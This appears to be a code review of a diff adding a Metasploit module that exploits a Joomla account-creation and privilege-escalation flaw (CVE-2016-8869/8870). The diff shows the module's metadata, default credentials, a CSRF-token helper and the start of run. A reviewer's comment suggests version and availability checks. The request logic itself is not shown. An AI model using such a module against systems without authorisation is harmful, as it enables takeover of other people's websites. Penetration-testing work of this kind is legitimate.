modules/auxiliary/admin/http/joomla_registration_privesc.rb

```diff
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HTTP::Joomla
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Joomla Account Creation and Privilege Escalation',
+      'Description'    => %q{
+        This module allows to create an arbitrary account with administrative privileges in Joomla versions 3.4.4
+        through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).
+      },
+      'References'     =>
+        [
+          ['CVE', '2016-8869'],
+          ['CVE', '2016-8870'],
+          ['URL', 'https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html'],
+          ['URL', 'https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html'],
+          ['URL', 'https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2']
+        ],
+      'Author'         =>
+        [
+          'Fabio Pires <fp[at]integrity.pt>',     # module creation and privilege escalation
+          'Filipe Reis <fr[at]integrity.pt>',     # module creation and privilege escalation
+          'Vitor Oliveira <vo[at]integrity.pt>',  # module creation and privilege escalation
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Oct 25 2016'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/']),
+        OptString.new('USERNAME', [true, 'Username that will be created', 'expl0it3r']),
+        OptString.new('PASSWORD', [true, 'Password for the username', 'expl0it3r']),
+        OptString.new('EMAIL', [true, 'Email to receive the activation code for the account', 'example@youremail.com'])
+      ]
+    )
+    deregister_options('VHOST')
+  end
+
+  def get_csrf(hidden_fields)
+    hidden_list = hidden_fields
+    hidden_list.each do |fields|
+      fields.each do |item|
+        if item[0].length == 32 && item[1] == '1'
+          return item[0]
+        end
+      end
+    end
+  end
+
+  def run
+    print_status("Trying to create the user!")
```

Comment:
you can run `joomla_and_online?` before this line. This ensures the site is online and running joomla.
You can also implement a check method and check `joomla_version` against vulnerable versions and call the `check` method from within `run`